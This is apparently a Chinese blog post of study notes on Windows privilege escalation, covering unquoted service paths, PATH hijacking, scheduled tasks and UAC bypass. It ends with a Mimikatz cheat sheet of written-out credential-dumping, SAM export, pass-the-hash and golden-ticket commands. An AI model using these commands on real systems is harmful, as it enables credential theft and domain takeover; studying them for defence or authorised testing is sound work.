加载中...

权限提升咯

权限提升

Windows下权限提升

1.缓存溢出漏洞

--查找对应的EXP
利用别人发布的漏洞https://www.exploit-db.com/ 找对应的漏洞编号
在msf里面search一下
利用其他windowsEXP扫描工具

2.配置出错提权

--Trusted service path
Windows 解析未带引号但是有空格的服务时,会尝试查找空格前的对应名字的程序
举例
C:\Program Files\Common Files\Services 会尝试访问 C:\Promgram.exeC:\Program Files\Common.exe
只要创建对应木马程序到对应位置就可以以服务System权限运行
--path 环境变量
path解析从上到下,如果此时因为配置错误在某些高权限程序的前面有其他文件路径
C:\Windows\System32\ipconfig.exe 前面有 D:\xxxx
我们可以制作木马ipconfig.exe 到 D:\xxxx 从而在管理员执行ipconfig时提权

3.MSI提权

如果windows安装设置为高权限就可以用msfenvom生成的msi拿到高权限

4.进程注入提权

meterperter 的migrate注入一些高权限的程序

5.计划任务,启动项提权

--利用at
at 12:33 /interactive cmd.exe
--利用schtasks
查看一些restart的程序 schtasks /query /fo list /v /tn restart
然后修改对应程序为木马
--启动项直接写入目录
C:\ ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
--启动项注册表
带有Run Runonce的注测表项

6.UAC提权

通过构造一些程序,询问管理员获得权限,从而提权,如图

在msf里面有 exploit/windows/local/bypassuac exploit/windows/loacal/ask 模块可以利用

7.Minikatz

--基本使用

#提升权限
privilege::debug
#抓取密码
sekurlsa::logonpasswords

明文保存密码

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
#重启或用户重新登录后可以成功抓取

--SAM表获得hash

#导出SAM数据
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

#使用mimikatz提取hash
lsadump::sam /sam:SAM /system:SYSTEM

--hash传递

#使用administrator用户的NTLM哈希值进行攻击
sekurlsa::pth /user:administrator /domain:192.168.10.15 /ntlm:329153f560eb329c0e1deea55e88a1e9

--票据传递

mimikatz "lsadump::dcsync /domain:xx.com /user:krbtgt"
kerberos::golden /admin:administrator /domain:ABC.COM /sid:S-1-5-21-3912242732-2617380311-62526969 /krbtgt:c7af5cfc450e645ed4c46daa78fe18da /ticket:test.kiribi
#导入刚才生成的票据
kerberos::ptt test.kiribi

#导入成功后可获取域管权限
dir \\dc.abc.com\c$
posted @ 2023-04-16 16:59  泠の半掉线  阅读(50)  评论(0)    收藏  举报